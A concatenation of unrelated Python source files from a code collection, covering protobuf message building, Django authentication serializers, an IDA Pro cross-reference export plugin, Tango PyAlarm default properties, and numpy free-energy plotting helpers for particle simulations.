result_class._FACTORY = self # pylint: disable=protected-access
# Assign in _classes before doing recursive calls to avoid infinite
# recursion.
self._classes[descriptor] = result_class
for field in descriptor.fields:
if field.message_type:
self.GetPrototype(field.message_type)
for extension in result_class.DESCRIPTOR.extensions:
if extension.containing_type not in self._classes:
self.GetPrototype(extension.containing_type)
extended_class = self._classes[extension.containing_type]
extended_class.RegisterExtension(extension)
return result_class
def GetMessages(self, files):
"""Gets all the messages from a specified file.
This will find and resolve dependencies, failing if the descriptor
pool cannot satisfy them.
Args:
files: The file names to extract messages from.
Returns:
A dictionary mapping proto names to the message classes. This will include
any dependent messages as well as any messages defined in the same file as
a specified message.
"""
result = {}
for file_name in files:
file_desc = self.pool.FindFileByName(file_name)
for desc in file_desc.message_types_by_name.values():
result[desc.full_name] = self.GetPrototype(desc)
# While the extension FieldDescriptors are created by the descriptor pool,
# the python classes created in the factory need them to be registered
# explicitly, which is done below.
#
# The call to RegisterExtension will specifically check if the
# extension was already registered on the object and either
# ignore the registration if the original was the same, or raise
# an error if they were different.
for extension in file_desc.extensions_by_name.values():
if extension.containing_type not in self._classes:
self.GetPrototype(extension.containing_type)
extended_class = self._classes[extension.containing_type]
extended_class.RegisterExtension(extension)
return result
_FACTORY = MessageFactory()
def GetMessages(file_protos):
"""Builds a dictionary of all the messages available in a set of files.
Args:
file_protos: Iterable of FileDescriptorProto to build messages out of.
Returns:
A dictionary mapping proto names to the message classes. This will include
any dependent messages as well as any messages defined in the same file as
a specified message.
"""
# The cpp implementation of the protocol buffer library requires to add the
# message in topological order of the dependency graph.
file_by_name = {file_proto.name: file_proto for file_proto in file_protos}
def _AddFile(file_proto):
for dependency in file_proto.dependency:
if dependency in file_by_name:
# Remove from elements to be visited, in order to cut cycles.
_AddFile(file_by_name.pop(dependency))
_FACTORY.pool.Add(file_proto)
while file_by_name:
_AddFile(file_by_name.popitem()[1])
return _FACTORY.GetMessages([file_proto.name for file_proto in file_protos])
|
py | 7dfaed44525cab981e4cdadbec8abe69ede2c22c | from configparser import ConfigParser
import configparser
import init_config
class Config:
def __init__(self):
self.parser = ConfigParser()
try:
self.parser.read('config.ini')
except configparser.NoSectionError:
init_config
def get_startup(self):
return self.parser.getboolean('basic', 'startup')
def get_productive(self):
return self.parser.getint('basic', 'productive')
def get_location(self):
return self.parser.get('files', 'location')
def set_startup(self, boolean):
if(boolean):
self.parser.set('basic', 'startup', 'true')
else:
self.parser.set('basic', 'startup', 'false')
self.save_config()
def set_productive(self, percentage):
self.parser.set('basic', 'productive', str(percentage))
self.save_config()
def set_location(self, location):
self.parser.set('files', 'location', location)
self.save_config()
def save_config(self):
with open('./config.ini', 'w') as c:
self.parser.write(c)
if __name__ == '__main__':
print(Config().get_startup()) |
py | 7dfaed914785c19fc716c5ce42b4c803dd2a1fcf | #!/usr/bin/env python3
# See LICENSE for licensing information.
#
# Copyright (c) 2021 Regents of the University of California and The Board
# of Regents for the Oklahoma Agricultural and Mechanical College
# (acting for and on behalf of Oklahoma State University)
# All rights reserved.
#
import sys, os
import unittest
sys.path.append(os.getenv("OPENCACHE_HOME"))
from testutils import *
import globals
from base.policy import replacement_policy as rp
from globals import OPTS
class verify_test(opencache_test):
def runTest(self):
OPENCACHE_HOME = os.getenv("OPENCACHE_HOME")
config_file = "{}/tests/configs/config.py".format(OPENCACHE_HOME)
globals.init_opencache(config_file)
OPTS.num_ways = 4
OPTS.replacement_policy = rp.LRU
OPTS.simulate = True
OPTS.synthesize = True
conf = make_config()
from cache import cache
c = cache(cache_config=conf,
name=OPTS.output_name)
c.save()
self.check_verification(conf, OPTS.output_name)
globals.end_opencache()
# Run the test from the terminal
if __name__ == "__main__":
(OPTS, args) = globals.parse_args()
del sys.argv[1:]
header(__file__)
unittest.main() |
py | 7dfaee1aa0af02c8c14cbf79ccd63c4a4f57182c | from django.contrib.auth import get_user_model, authenticate
from django.utils.translation import gettext_lazy as _
from rest_framework import serializers
class UserSerializer(serializers.ModelSerializer):
"""Serializer for the user object"""
class Meta:
model = get_user_model()
fields = ('name', 'email', 'password', 'problems')
extra_kwargs = {'password': {'write_only': True, 'min_length': 8}}
def create(self, validated_data):
"""Create a new user with encrypted password and return it"""
return get_user_model().objects.create_user(**validated_data)
def update(self, instance, validated_data):
"""Update a user, setting the password correctly and return it"""
password = validated_data.pop('password', None)
user = super().update(instance, validated_data)
if password:
user.set_password(password)
user.save()
return user
class AuthTokenSerializer(serializers.Serializer):
"""Serializer for the user authentication object"""
email = serializers.CharField()
password = serializers.CharField(
style={'input_type': 'password'},
trim_whitespace=False
)
def validate(self, attrs):
"""Validate and authenticate the user"""
email = attrs.get('email')
password = attrs.get('password')
user = authenticate(
request=self.context.get('request'),
username=email,
password=password
)
if not user:
msg = _('Unable to authenticate with provided credentials')
raise serializers.ValidationError(msg, code='authentication')
attrs['user'] = user
return attrs
|
py | 7dfaee5e9ad844e647c4921f76b1bb21ced8f038 | from __future__ import print_function
import os
import json
import ida_bytes
import ida_enum
import ida_kernwin
import ida_nalt
import ida_name
import ida_offset
import ida_struct
import ida_typeinf
import ida_ua
import idautils
import idc
from ida_idaapi import BADADDR
class export_handler_t(ida_kernwin.action_handler_t):
def activate(self, ctx):
addr = ida_kernwin.askaddr(0, "Target address")
if addr == BADADDR:
print('[Export-Xref] Bad address given')
return 1
filename = ida_kernwin.ask_file(True, '*', 'Export Xrefs to...')
if filename is None:
return 1
print('[Export-Xref] Exporting %s...' % filename)
with open(filename, 'w') as f:
for x in XrefsTo(addr, 0):
print("0x%08x," % x.frm, file=f)
print('[Export-Xref] Done')
return 1
def update(self, ctx):
return ida_kernwin.AST_ENABLE_ALWAYS
class export_xref_t(ida_idaapi.plugin_t):
flags = 0
comment = "Export Xref into a C-friendly format"
help = "Export Xref"
wanted_name = "Export-Xref"
wanted_hotkey = ''
def init(self):
export_action = ida_kernwin.action_desc_t(
'export-xref:export',
'Export Xref...',
export_handler_t())
ida_kernwin.register_action(export_action)
ida_kernwin.attach_action_to_menu(
'File/Produce file/',
'export-xref:export',
ida_kernwin.SETMENU_APP
)
print("[Export-Xref] Loaded")
return ida_idaapi.PLUGIN_OK
def run(self, arg):
pass
def term(self):
pass
def PLUGIN_ENTRY():
return export_xref_t() |
py | 7dfaee814a9ba6ec5a96cf9049f64a3ecfaca822 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#############################################################################
##
## This file is part of Tango Control System
##
## http://www.tango-controls.org/
##
## Author: Sergi Rubio Manrique
##
## This is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
##
## This software is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, see <http://www.gnu.org/licenses/>.
###########################################################################
__doc__ = """
=================================
PyAlarm Device Default Properties
=================================
"""
import fandango as fd
from fandango.functional import join,djoin,time2str,str2time
from fandango.tango import PyTango,get_tango_host
try:
tango_host = get_tango_host().split(':')[0]
except:
tango_host = 'PyAlarm'
#@TODO: ERROR as a positive value causes problems to Eval
#(but it must be positive to appear first on lists?)
#The higher the value, the higher it will appear on View lists
AlarmStates = fd.Struct({
'NORM':0, #Normal state
'RTNUN':1, #Active but returned to normal
'ACKED':2, #Acknowledged by operator
'ACTIVE':3, #UNACK alias
'UNACK':4, #Active and unacknowledged
'ERROR':-1, #PyAlarm not working properly, exception on formula
'SHLVD':-2, #Silenced, hidden, ignored, (DEBUG), temporary state
'DSUPR':-3, #Disabled by a process condition (Enabled), failed not throwed
'OOSRV':-4, #Unconditionally disabled, Enable = False, Device is OFF
})
ACTIVE_STATES = 'ACTIVE','UNACK','ACKED','RTNUN'
DISABLED_STATES = 'ERROR','SHLVD','OOSRV','DSUPR'
SORT_ORDER = ('Error','Active','_State','Priority','Time')
#@TODO: Rename to PRIORITIES, adapt to IEC Document
SEVERITIES = {'DEBUG':0,
'INFO':1,
'WARNING':2,
'ALARM':3,
'ERROR':4,
'CONTROL':-1
}
DEFAULT_SEVERITY = 'WARNING'
SUMMARY_FIELDS = 'tag','state','priority','time','formula','message'
# Must be lists, not tuples
DATA_FIELDS = ('tag','device','priority','formula',
'message','annunciators')
STATE_FIELDS = ('state','time','counter','active','disabled',
'acknowledged','updated','last_sent','last_error')
#ALARM_ROW = ['tag','get_state','get_time','device','description']
#DEFAULT_COLUMNS = ['tag','get_state','active','get_time','severity']
VIEW_FIELDS = ['tag','device','state','priority','time']
CSV_FIELDS = 'tag,device,description,severity,receivers,formula'.split(',')
FORMATTERS = fd.defaultdict(lambda :str)
FORMATTERS.update({
'tag' : lambda s,l=10: ('{0:<%d}'%(l or 4)).format(s),
#'time' : lambda s,l=25: ('{:^%d}'%l).format(s),
'device' : lambda s,l=25: ('{0:^%d}'%(l or 4)).format(s),
'description' : lambda s,l=50: ('{0:<}').format(s),
'message' : lambda s,l=50: ('{0:<}').format(s),
'severity' : lambda s,l=10: ('{0:^%d}'%(l or 4)).format(s),
'priority' : lambda s,l=10: ('{0:^%d}'%(l or 4)).format(s),
'get_state' : lambda s,l=10: ('{0:^%d}'%(l or 4)).format(s),
'get_time' :
lambda s,l=20: ('{0:^%d}'%(l or 4)).format(time2str(s,bt=0)),
'active' : lambda s,l=20: (('{0:^%d}'%(l or 4)).format(
'FAILED!' if s is None else (
'Not Active' if not s else (
s if s in (1,True) else (
time2str(s,bt=0)))))),
'formula' : lambda s,l=100: ('{0:^%d}'%(l or 4)).format(s),
#'tag' : lambda s,l: ('{:^%d}'%l).format(s),
})
INFO_REQUESTS = ['SETTINGS','STATE','VALUES','SNAP']
#THIS ARE ALSO THE DIFFERENT ACTION TYPES TO BE CONFIGURED
MESSAGE_TYPES = ['ALARM','ACKNOWLEDGED','RECOVERED','REMINDER',
'AUTORESET','RESET','DISABLED',]
__doc__+="""
PANIC_PROPERTIES: This properties will be shared by the whole TANGO_HOST
"""
PANIC_PROPERTIES = {
'PhoneBook':
[PyTango.DevVarStringArray,
"List of receiver aliases, declared like:\n\
\t%USER:[email protected];SMS:+34666555666",
[] ],
'SMSConfig':
[PyTango.DevString,
"Arguments for sendSMS command",
[ ] ],#user:word
'SMSMaxLength':
[PyTango.DevLong,
"Maximum length of SMS messages",
[ 135 ] ],
'SMSMaxPerDay':
[PyTango.DevLong,
"Maximum SMS messages per day",
[ 50 ] ],
'MailMethod':
[PyTango.DevString,
"mail or smtp[:host[:port]]",
[ "mail" ] ],
'MailDashRoption':
[PyTango.DevString,
"If not empty, use -r to specify from_address instead of -S from=. "
"Required in Debian and other linux systems",
[ "true" ] ],
'FromAddress':
[PyTango.DevString,
"Address that will appear as Sender in mail and SMS",
[ tango_host ] ],
'AllowedActions':
[PyTango.DevVarStringArray,
"List of OS commands that alarms are able to execute.",
[] ],
'StartupDelay':
[PyTango.DevLong,
"Number of seconds that PyAlarm will "
"wait before starting to evaluate alarms.",
[ 0 ] ],
'PanicAdminUsers':
[PyTango.DevVarStringArray,
"Users authorized to modify the Alarms (apart of receivers) ",
[ ] ],
'PanicUserTimeout':
[PyTango.DevLong,
"Number of seconds to keep user login in panic GUI",
[ 60 ] ],
'UserValidator':
[PyTango.DevString,
"Module.Class to be used to validate admin user/passwords.",
[ ] ],
'GlobalReceivers':
[PyTango.DevVarStringArray,
"Receivers to be applied globally to all alarms\n\
Declared as FILTER:receiver,ACTION(MESSAGE:...) like\n\
\t*VC*:[email protected],ACTION(RESET:command,t/t/t/stop)",
[ 0 ] ],
'AlarmWikiLink':
[PyTango.DevString,
"An URL to a WiKi page, where one can find more info on alarma. If set it will appear in AlarmEditor widget.\n\
The URL may contain {%ALARM%} which is then substituted with an alarm tag. ",
[ ] ],
}
__doc__+="""
ALARM_TABLES: Properties used to store Alarms declaration in Panic<=6
This properties will be managed by API;
DON'T ACCESS THEM WITH self.$Property from the device
"""
ALARM_TABLES = {
'AlarmList':
[PyTango.DevVarStringArray,
"List of alarms to be monitorized. The format is:\n<br>"
"domain/family/member #It simply checks that dev is alive\n<br>"
"domain/family/member/attribute > VALUE\n<br>"
"domain/family/member/State == UNKNOWN\n<br>"
"domain/family/*/Temperature > VALUE\n<br>\n<br>"
"When using wildcards all slash / must be included",
[] ],
'AlarmReceivers':
[PyTango.DevVarStringArray,
"Users that will be notified for each alarm. The format is:\n<br>"
"[TYPE]:[ADDRESS]:[attributes];...\n<br>\n<br>"
"[TYPE]: MAIL / SMS\n<br>"
"[ADDRESS] : [email protected] / +34666555444\n<br>"
"[attributes]: domain/family/member/attribute;domain/family/*",
[] ],
'AlarmDescriptions':
[PyTango.DevVarStringArray,
"Description to be included in emails for each alarm.\n<br>"
"The format is:TAG:AlarmDescription...",
[] ],
'AlarmConfigurations':
[PyTango.DevVarStringArray,
"Configuration customization appliable to each alarm.\n<br>"
"The format is: TAG:PAR1=Value1;PAR2=Value2;...",
[] ],
'AlarmSeverities':
[PyTango.DevVarStringArray,
"ALARM:DEBUG/INFO/WARNING/ALARM/ERROR\n<br>"
"#DEBUG alarms will not trigger messages",
[] ],
}
__doc__+="""
ALARM_CYCLE: Properties to manage the timing of Alarm stages
"""
ALARM_CYCLE = {
'Enabled':
[PyTango.DevString,
"If False forces the device to Disabled state and avoids messaging;"
" if INT then it will last only for N seconds after Startup; "
"if a python formula is written it will enable/disable the device",
[ '120' ] ],#Overriden by panic.DefaultPyAlarmProperties
'AlarmThreshold':
[PyTango.DevLong,
"Min number of consecutive Events/Pollings that must trigger an Alarm.",
[ 3 ] ],
'AlertOnRecovery':
[PyTango.DevString,
"It can contain 'email' and/or 'sms' keywords to specify "
"if an automatic message must be sent in case of alarm "
"returning to safe level.",
[ "false" ] ],
'PollingPeriod':
[PyTango.DevFloat,
"Period in SECONDS to poll all not event-driven attributes."
"@TODO for convenience any value above 300 will be divided by 1000, "
"@DEPRECATE",
[ 15. ] ],
'Reminder':
[PyTango.DevLong,
"If a number of seconds is set, a reminder mail will be sent "
"while the alarm is still active, if 0 no Reminder will be sent.",
[ 0 ] ],
'AutoReset':
[PyTango.DevFloat,
"If a number of seconds is set, the alarm will reset if "
"the conditions are no longer active after the given interval.",
[ 3600. ] ],
'RethrowState':
[PyTango.DevBoolean,
"Whether exceptions in State reading will activate the Alarm.",
[ True ] ],
'RethrowAttribute':
[PyTango.DevBoolean,
"Whether exceptions in Attribute reading will activate the Alarm.",
[ False ] ],
'IgnoreExceptions':
[PyTango.DevString,
"Value can be False/True/NaN to return Exception, None or NotANumber"
" in case of read_attribute exception.",
[ 'True' ] ],#Overriden by panic.DefaultPyAlarmProperties
}
__doc__+="""
ALARM_ARCHIVE: Properties to manage the saving of Alarms
"""
ALARM_ARCHIVE = {
'UseSnap':
[PyTango.DevBoolean,
"If false no snapshots will be trigered "
"(unless specifically added to receivers)",
[ True ] ],
'CreateNewContexts':
[PyTango.DevBoolean,
"It enables PyAlarm to create new contexts for alarms "
"if no matching context exists in the database.",
[ False ] ],
}
__doc__+="""
ALARM_LOGS: Properties to manage the logging of Alarms
"""
ALARM_LOGS = {
'LogFile':
[PyTango.DevString,
"""File where alarms are logged, like /tmp/alarm_$NAME.log\n
Keywords are $DEVICE,$ALARM,$NAME,$DATE\n
If version>6.0 a FolderDS-like device can be used for remote logging:\n
\ttango://test/folder/01/$ALARM_$DATE.log""",
[ "" ] ],
'HtmlFolder':
[PyTango.DevString,
"File where alarm reports are saved",
[ "htmlreports" ] ],
'FlagFile':
[PyTango.DevString,
"File where a 1 or 0 value will be written depending if theres "
"active alarms or not.\n<br>This file can be used by other "
"notification systems.",
[ "/tmp/alarm_ds.nagios" ] ],
'MaxMessagesPerAlarm':
[PyTango.DevLong,
"Max Number of messages to be sent each time that an Alarm "
"is activated/recovered/reset.",
[ 0 ] ],
'MailMethod':
[PyTango.DevString,
"mail or smtp[:host[:port]]",
[ "mail" ] ],
'FromAddress':
[PyTango.DevString,
"Address that will appear as Sender in mail and SMS",
[ tango_host ] ],
'SMSConfig':
[PyTango.DevString,
"Arguments for sendSMS command (user:word)",
[ ] ],
'TGConfig':
[PyTango.DevString,
"Arguments for sendTelegram command",
[ "" ] ],
}
__doc__+="""
DEVICE_CONFIG: PyAlarm/PanicDS instance configuration.
"""
DEVICE_CONFIG = {
'VersionNumber':
[PyTango.DevString,
"API version used (device-managed)",
[ "6.1.1" ] ],
'LogLevel':
[PyTango.DevString,
"stdout log filter",
[ "INFO" ] ],
'StartupDelay':
[PyTango.DevLong,
"Number of seconds that PyAlarm will wait before starting.",
[ 0 ] ],
'EvalTimeout':
[PyTango.DevLong,
"Timeout for read_attribute calls, in milliseconds .",
[ 500 ] ],
'UseProcess':
[PyTango.DevBoolean,
"To create new OS processes instead of threads.",
[ False ] ],
'UseTaurus':
[PyTango.DevBoolean,
"Use Taurus to connect to devices instead of plain PyTango.",
[ False ] ],
}
TODO_LIST = {
'PushEvents':
[PyTango.DevVarStringArray,
"Events to be pushed by Alarm and AlarmLists attributes",
[] ] ,
}
PyAlarmDefaultProperties = dict(join(d.items() for d in
(ALARM_CYCLE,ALARM_ARCHIVE,ALARM_LOGS,DEVICE_CONFIG)))
DEVICE_PROPERTIES = dict(join(v.items() for v in
(PyAlarmDefaultProperties,ALARM_TABLES)))
ALARM_CONFIG = (ALARM_CYCLE.keys()+ALARM_ARCHIVE.keys()
+ALARM_LOGS.keys()+DEVICE_CONFIG.keys())
try:
from fandango.doc import get_fn_autodoc
__doc__ = get_fn_autodoc(__name__,vars(),
module_vars=['PANIC_PROPERTIES','DEVICE_CONFIG','ALARM_LOGS',
'ALARM_CYCLE','ALARM_TABLES','ALARM_ARCHIVE'])
except:
import traceback
traceback.print_exc()
|
py | 7dfaef16762b277d5acfed569191825d87ac3965 | # Demonstration Python module for Week 3
# Scientific Computing, Fall 2021, [email protected]
# Read a source and target points and target points from files.
import numpy as np # general numpy
SourcePointsFile = "SourcePoints.txt"
TargetPointsFile = "TargetPoints.txt"
# Source points
def read():
inFile = open( SourcePointsFile, "r") # open the source points file
firstLine = inFile.readline() # the first line has the number of points
nPoints = int(firstLine) # convert the number from string to int
sourcePoints = np.zeros([nPoints,3]) # the source points array
for p in range(nPoints):
dataLine = inFile.readline() # there is one point per line
words = dataLine.split() # each word is a number
x = np.float64(words[0]) # x, y, and z coordinates
y = np.float64(words[1]) # convert from string to float
z = np.float64(words[2])
sourcePoints[p,0] = x # save the numbers in the numpy array
sourcePoints[p,1] = y
sourcePoints[p,2] = z
inFile.close()
# target points
inFile = open( TargetPointsFile, "r") # open the source points file
firstLine = inFile.readline() # the first line has the number of points
nPoints = int(firstLine) # convert the number from string to int
targetPoints = np.zeros([nPoints,3]) # the source points array
for p in range(nPoints):
dataLine = inFile.readline() # there is one point per line
words = dataLine.split() # each word is a number
x = np.float64(words[0]) # x, y, and z coordinates
y = np.float64(words[1]) # convert from string to float
z = np.float64(words[2])
targetPoints[p,0] = x # save the numbers in the numpy array
targetPoints[p,1] = y
targetPoints[p,2] = z
inFile.close()
return sourcePoints, targetPoints
|
py | 7dfaf07e43c10f31685335b99495920ed85f6b19 | import numpy as np
import matplotlib.pyplot as plt
def free_energy_bootstrap(D, l, r, n, sample=100, weights=None, bias=None, temperature=1.0):
""" Bootstrapped free energy calculation
If D is a single array, bootstraps by sample. If D is a list of arrays, bootstraps by trajectories
Parameters
----------
D : array of list of arrays
Samples in the coordinate in which we compute the free energy
l : float
leftmost bin boundary
r : float
rightmost bin boundary
n : int
number of bins
sample : int
number of bootstraps
weights : None or arrays matching D
sample weights
bias : function
if not None, the given bias will be removed.
Returns
-------
bin_means : array((nbins,))
mean positions of bins
Es : array((sample, nbins))
for each bootstrap the free energies of bins.
"""
bins = np.linspace(l, r, n)
Es = []
I = np.arange(len(D))
by_traj = isinstance(D, list)
for s in range(sample):
Isel = np.random.choice(I, size=len(D), replace=True)
if by_traj:
Dsample = np.concatenate([D[i] for i in Isel])
Wsample = None
if weights is not None:
Wsample = np.concatenate([weights[i] for i in Isel])
Psample, _ = np.histogram(Dsample, bins=bins, weights=Wsample, density=True)
else:
Dsample = D[Isel]
Wsample = None
if weights is not None:
Wsample = weights[Isel]
Psample, _ = np.histogram(Dsample, bins=bins, weights=Wsample, density=True)
Es.append(-np.log(Psample))
Es = np.vstack(Es)
Es -= Es.mean(axis=0).min()
bin_means = 0.5 * (bins[:-1] + bins[1:])
if bias is not None:
B = bias(bin_means) / temperature
Es -= B
return bin_means, Es # / temperature
def mean_finite_(x, min_finite=1):
""" Computes mean over finite values """
isfin = np.isfinite(x)
if np.count_nonzero(isfin) > min_finite:
return np.mean(x[isfin])
else:
return np.nan
def std_finite_(x, min_finite=2):
""" Computes mean over finite values """
isfin = np.isfinite(x)
if np.count_nonzero(isfin) > min_finite:
return np.std(x[isfin])
else:
return np.nan
def mean_finite(x, axis=None, min_finite=1):
if axis is None:
return mean_finite_(x)
if axis == 0 or axis == 1:
M = np.zeros((x.shape[axis - 1],))
for i in range(x.shape[axis - 1]):
if axis == 0:
M[i] = mean_finite_(x[:, i])
else:
M[i] = mean_finite_(x[i])
return M
else:
raise NotImplementedError('axis value not implemented:', axis)
def std_finite(x, axis=None, min_finite=2):
if axis is None:
return mean_finite_(x)
if axis == 0 or axis == 1:
S = np.zeros((x.shape[axis - 1],))
for i in range(x.shape[axis - 1]):
if axis == 0:
S[i] = std_finite_(x[:, i])
else:
S[i] = std_finite_(x[i])
return S
else:
raise NotImplementedError('axis value not implemented:', axis)
def distance(x, particles, dims):
"""Returns distances between particles"""
x = x.reshape(-1, particles, dims)
distances = np.sqrt(np.power((np.expand_dims(x, 1) - np.expand_dims(x, 2)), 2).sum(-1))
# take only the relevant terms (upper triangular)
row_idx, col_idx = np.triu_indices(distances.shape[1], 1)
return distances[:, row_idx, col_idx]
def energy_plot(x, potential):
if potential == "dimer":
d = x - 3
d2 = d ** 2
d4 = d2 ** 2
return -4. * d2 + 1. * d4
elif potential == "prince":
"""Prince energy"""
x = x - 2
x1 = x ** 8
x2 = np.exp(-80. * x * x)
x3 = np.exp(-80. * (x - 0.5) ** 2)
x4 = np.exp(-40. * (x + 0.5) ** 2)
return 4 * (1. * x1 + 0.8 * x2 + 0.2 * x3 + 0.5 * x4)
def plot_system(x, n_particles, n_dimensions, n_plots=(4, 4),
lim=4):
"""Plot system of 4 particles."""
x = x.reshape(-1, n_particles, n_dimensions)
# np.random.shuffle(x)
if n_dimensions > 2:
raise NotImplementedError("dimension must be <= 2")
plt.figure(figsize=(n_plots[1] * 2, n_plots[0] * 2))
for i in range(np.prod(n_plots)):
plt.subplot(*n_plots, i+1)
plt.scatter(*x[i].T)
#plt.xticks([])
#plt.yticks([])
plt.tight_layout()
plt.xlim((-lim, lim))
plt.ylim((-lim, lim))
############################## Plotting #######################################
def create_plots_2part(file, filename, fixed_z, x_samples, delta_logp, potential, epoch):
"""Plots for 2 particle dimer."""
data_shape = x_samples.shape[1]
n_dims = data_shape // 2
fig_filename = os.path.join(file, filename, "pos" + "{:04d}.jpg".format(epoch))
utils.makedirs(os.path.dirname(fig_filename))
generated_samples = x_samples.view(-1, data_shape).data.cpu().numpy()
# plot dimer
if n_dims == 2:
plt.figure(figsize=(5, 4))
for point in generated_samples[100:200]:
plt.plot([point[0], point[2]], [point[1], point[3]], 'k-', lw=0.5)
plt.scatter(point[0], point[1], c='r', marker='x')
plt.scatter(point[2], point[3], c='b', marker='x')
plt.savefig(fig_filename, bbox_inches='tight')
generated_samples = distance(x_samples.data.cpu().numpy(), 2, n_dims).reshape(-1)
jac = - delta_logp.data.cpu().view(-1).numpy()
plt.figure(figsize=(5, 4))
h, b = np.histogram(generated_samples, bins=100)
Eh = -np.log(h)
Eh = Eh - Eh.min()
if potential == "prince":
d = np.linspace(0, 4, num=200)
elif potential == "dimer":
d = np.linspace(0, 6, num=200)
energies = energy_plot(d, potential) - (n_dims - 1) * np.log(d)
plt.plot(d, energies - energies.min(), linewidth=2, )
bin_means = 0.5 * (b[:-1] + b[1:])
plt.plot(bin_means, Eh)
plt.ylim(0, 6)
fig_filename = os.path.join(file, filename, "{:04d}.jpg".format(epoch))
plt.savefig(fig_filename, bbox_inches='tight')
# reweighting factor
print(jac.shape, energy_plot(generated_samples, potential).shape, (0.5 * np.sum(fixed_z.view(-1, data_shape).data.cpu().numpy() ** 2, axis=1)).shape)
log_w = - energy_plot(generated_samples, potential) + 0.5 * np.sum(fixed_z.view(-1, data_shape).data.cpu().numpy() ** 2, axis=1) + jac
print(np.mean(energy_plot(generated_samples, potential)), np.mean(0.5 * np.sum(fixed_z.view(-1, data_shape).data.cpu().numpy() ** 2, axis=1)), np.mean(jac))
print(min(log_w), max(log_w))
plt.figure(figsize=(5, 4))
if potential == "prince":
bin_means, Es = free_energy_bootstrap(generated_samples, -4, 4, 100, sample=100, weights=np.exp(log_w))
elif potential == "dimer":
bin_means, Es = free_energy_bootstrap(generated_samples, 0, 10, 100, sample=100,
weights=np.exp(log_w))
plt.plot(d, energies - energies.min(), linewidth=2, )
Emean = mean_finite(Es, axis=0)
Estd = std_finite(Es, axis=0)
plt.fill_between(bin_means, Emean, Emean + Estd, alpha=0.2)
plt.fill_between(bin_means, Emean, Emean - Estd, alpha=0.2)
plt.plot(bin_means, Emean)
plt.ylim(0, 6)
fig_filename = os.path.join(file, filename, "rew" + "{:04d}.jpg".format(epoch))
utils.makedirs(os.path.dirname(fig_filename))
plt.savefig(fig_filename, bbox_inches='tight')
def create_plots_3part(file, filename, fixed_z, x_samples, delta_logp, potential, epoch):
fig_filename = os.path.join(file, filename, "pos" + "{:04d}.jpg".format(epoch))
utils.makedirs(os.path.dirname(fig_filename))
data_shape = x_samples.shape[1]
n_dims = data_shape // 3
generated_samples = x_samples.view(-1, data_shape).data.cpu().numpy()
# plot mean of dimer
plt.figure(figsize=(5, 4))
for point in generated_samples[1000:1020]:
plt.plot([point[0], point[2]], [point[1], point[3]], 'k-', lw=0.2)
plt.plot([point[0], point[4]], [point[1], point[5]], 'k-', lw=0.2)
plt.plot([point[2], point[4]], [point[3], point[5]], 'k-', lw=0.2)
plt.scatter(point[0], point[1], c='r', marker='x')
plt.scatter(point[2], point[3], c='b', marker='x')
plt.scatter(point[4], point[5], c='g', marker='x')
plt.savefig(fig_filename, bbox_inches='tight')
plt.figure(figsize=(5, 4))
dists = distance(generated_samples, 3, n_dims)
plt.hist(np.sum(energy_plot(dists, potential), axis=-1), bins=1000, density=True)
plt.xlabel('Energy')
plt.ylabel('Probability')
plt.xlim(-13, 20)
fig_filename = os.path.join(file, filename, "energy" + "{:04d}.jpg".format(epoch))
plt.savefig(fig_filename, bbox_inches='tight')
dists = distance(generated_samples, 3, n_dims)
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
xs = dists[:, 0][np.where(dists[:, 2] < 3)]
ys = dists[:, 1][np.where(dists[:, 2] < 3)]
zs = dists[:, 2][np.where(dists[:, 2] < 3)]
ax.scatter(xs, ys, zs, c="r", marker='.', s=[1, 1, 1])
ax.set_xlabel('Dist 1')
ax.set_ylabel('Dist 2')
ax.set_zlabel('Dist 3')
# ax.set_zlim(0,3)
fig_filename = os.path.join(file, filename, "bottom" + "{:04d}.jpg".format(epoch))
utils.makedirs(os.path.dirname(fig_filename))
plt.savefig(fig_filename, bbox_inches='tight')
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
xs = dists[:, 0][np.where(dists[:, 2] > 3)]
ys = dists[:, 1][np.where(dists[:, 2] > 3)]
zs = dists[:, 2][np.where(dists[:, 2] > 3)]
ax.scatter(xs, ys, zs, c="r", marker='.', s=[1, 1, 1])
ax.set_xlabel('Dist 1')
ax.set_ylabel('Dist 2')
ax.set_zlabel('Dist 3')
# ax.set_zlim(0,3)
fig_filename = os.path.join(file, filename, "top" + "{:04d}.jpg".format(epoch))
utils.makedirs(os.path.dirname(fig_filename))
plt.savefig(fig_filename, bbox_inches='tight')
# TODO reweighting
# projection on axis
for i, a in enumerate("xyz"):
plt.figure(figsize=(5, 4))
h, b = np.histogram(dists[:, i], bins=100)
Eh = -np.log(h)
Eh = Eh - Eh.min()
d = np.linspace(0, 6, num=200)
energies = energy_plot(d, potential) - np.log(d)
plt.plot(d, energies - energies.min(), linewidth=2, )
bin_means = 0.5 * (b[:-1] + b[1:])
plt.plot(bin_means, Eh)
plt.ylim(0, 6)
fig_filename = os.path.join(file, filename, a+"{:04d}.jpg".format(epoch))
utils.makedirs(os.path.dirname(fig_filename))
plt.savefig(fig_filename, bbox_inches='tight')
def create_plots_4part(file, filename, fixed_z, x_samples, delta_logp, potential, epoch):
fig_filename = os.path.join(file, filename, "pos" + "{:04d}.jpg".format(epoch))
utils.makedirs(os.path.dirname(fig_filename))
data_shape = x_samples.shape[1]
n_dims = data_shape // 4
generated_samples = x_samples.view(-1, data_shape).data.cpu().numpy()
plot_system(generated_samples, 4, n_dims)
plt.savefig(fig_filename, bbox_inches='tight')
plt.figure(figsize=(5, 4))
dists = distance(generated_samples, 4, n_dims)
plt.hist(np.sum(energy_plot(dists, potential), axis=-1), bins=1000, density=True)
plt.xlabel('Energy')
plt.ylabel('Probability')
plt.xlim(-25, 20)
fig_filename = os.path.join(file, filename, "energy" + "{:04d}.jpg".format(epoch))
plt.savefig(fig_filename, bbox_inches='tight')
n_particles = 4
n_dimensions = 2
plt.figure(figsize=(10, 10))
# dists = all_distances(torch.Tensor(data).view(-1, n_particles, n_dimensions)).numpy()
plot_idx = 1
for i in range(n_particles):
for j in range(n_particles - 1):
values, bins = np.histogram(dists[:, i + j], bins=100)
values = -np.log(values)
plt.subplot(n_particles, n_particles - 1, plot_idx)
